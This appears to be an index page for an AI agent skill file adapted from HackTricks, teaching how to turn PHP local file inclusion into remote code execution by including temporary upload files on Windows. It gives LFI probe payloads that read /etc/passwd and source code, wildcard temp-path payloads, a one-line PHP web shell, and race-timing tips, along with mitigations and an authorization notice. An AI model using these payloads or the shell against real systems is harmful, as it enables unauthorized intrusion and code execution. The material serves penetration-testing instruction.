OpenSkillIndex← back to search

Hacktricks-skills lfi-temp-file-exploitation

How to test for and exploit Local File Inclusion (LFI) vulnerabilities that can lead to Remote Code Execution (RCE) through temporary file uploads. Use this skill whenever you're testing web applications for file inclusion vulnerabilities, analyzing PHP file upload handlers, investigating potential LFI-to-RCE attack vectors, or when a user mentions LFI, file uploads, temporary files, or PHP file handling in a security testing context.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads/SKILL.MD
source content

LFI to RCE via Temporary File Uploads

This skill helps you test for and understand Local File Inclusion (LFI) vulnerabilities that can be exploited through PHP's temporary file upload mechanism to achieve Remote Code Execution (RCE).

Understanding the Vulnerability

How PHP File Uploads Work

When PHP receives a POST request with files formatted according to RFC 1867, it:

  1. Creates temporary files to store uploaded data
  2. Stores these files in a system-specific temporary directory
  3. Automatically deletes remaining temporary files after script execution
  4. Requires 
    move_uploaded_file()
    to relocate files for persistent storage

The Attack Vector: If an application has an LFI vulnerability, attackers can include these temporary files during the upload window before PHP deletes them, potentially executing malicious code.

The Challenge

The main obstacle is predicting the temporary file's name, which is intentionally randomized. However, the randomization strength varies significantly between operating systems.

Windows Exploitation

Windows systems have weaker randomization, making exploitation more feasible.

Temporary File Naming Pattern

On Windows, PHP uses 

GetTempFileName
which creates files with this pattern:

<path>\<pre><uuuu>.TMP

Where:

  • Path: Typically 
    C:\Windows\Temp
  • Prefix: Usually 
    php
  • <uuuu>: Unique hexadecimal value (only lower 16 bits used)

Key Insight: Only 65,535 unique names are possible with constant path and prefix, making brute force feasible.

Wildcard Exploitation

Windows 

FindFirstFile
function allows wildcards in LFI paths. Use this to locate temporary files:

http://site/vuln.php?inc=c:\windows\temp\php<<

Testing Strategy:

  1. Start with the basic wildcard pattern: 
    php<<
  2. If needed, try more specific masks: 
    php1<<
    , 
    phpA<<
    , 
    php0<<
  3. Systematically iterate through different prefix variations

Common Windows Temp Paths to Test

C:\Windows\Temp\php<<
C:\Temp\php<<
C:\Windows\TEMP\php<<
%TEMP%\php<<

Linux Exploitation

Linux systems use robust randomization for temporary file names, making them:

  • Not predictable
  • Not susceptible to brute force attacks
  • Generally not exploitable via this technique

Note: Focus your testing efforts on Windows systems when using this technique.

Testing Methodology

Step 1: Identify File Upload Functionality

Look for:

  • File input fields (
    <input type="file">
    )
  • PHP scripts handling file uploads
  • POST requests with multipart/form-data

Step 2: Confirm LFI Vulnerability

Test for LFI with standard payloads:

?include=../../etc/passwd
?file=....//....//....//etc/passwd
?inc=php://filter/convert.base64-encode/resource=index.php

Step 3: Test Temporary File Inclusion

  1. Prepare a malicious payload (e.g., PHP shell)
  2. Upload the file while simultaneously attempting LFI
  3. Use wildcard patterns on Windows to locate the temp file
  4. Verify code execution through the included file

Step 4: Timing Considerations

The attack window is narrow:

  • Upload must complete
  • LFI must occur before script execution ends
  • PHP must not have deleted the temp file yet

Consider using:

  • Concurrent requests
  • Slowloris-style delays
  • Race condition techniques

Example Payloads

Basic PHP Shell

<?php echo "LFI to RCE successful!"; system($_GET['cmd']); ?>

Windows Wildcard LFI Payloads

?inc=c:\windows\temp\php<<
?inc=c:\windows\temp\php1<<
?inc=c:\windows\temp\phpA<<
?inc=c:\windows\temp\php0<<
?inc=c:\windows\temp\php*<<

Detection and Prevention

For Security Testers

Signs of vulnerability:

  • PHP file upload functionality present
  • LFI vulnerability confirmed
  • Windows server environment
  • Temporary files accessible via include paths

For Defenders

Mitigation strategies:

  1. Disable file uploads if not needed
  2. Use 
    move_uploaded_file()
     immediately after upload
  3. Store uploads outside web root
  4. Disable 
    allow_url_include
     in php.ini
  5. Implement strict file validation
  6. Use prepared statements for file paths
  7. Apply principle of least privilege

Tools and Scripts

Use the bundled scripts in 

scripts/
to:

  • Generate wildcard test payloads for Windows
  • Enumerate common temp file paths
  • Create test payloads for upload testing

Safety and Ethics

Important: Only test systems you have explicit authorization to assess. Unauthorized exploitation of LFI vulnerabilities is illegal and unethical.

References

When to Use This Skill

Use this skill when:

  • Testing web applications for LFI vulnerabilities
  • Analyzing PHP file upload handlers
  • Investigating potential RCE attack vectors
  • Security assessments involving file inclusion
  • When a user mentions LFI, file uploads, temporary files, or PHP file handling in a security context
  • Preparing for penetration testing engagements
  • Understanding the LFI-to-RCE attack chain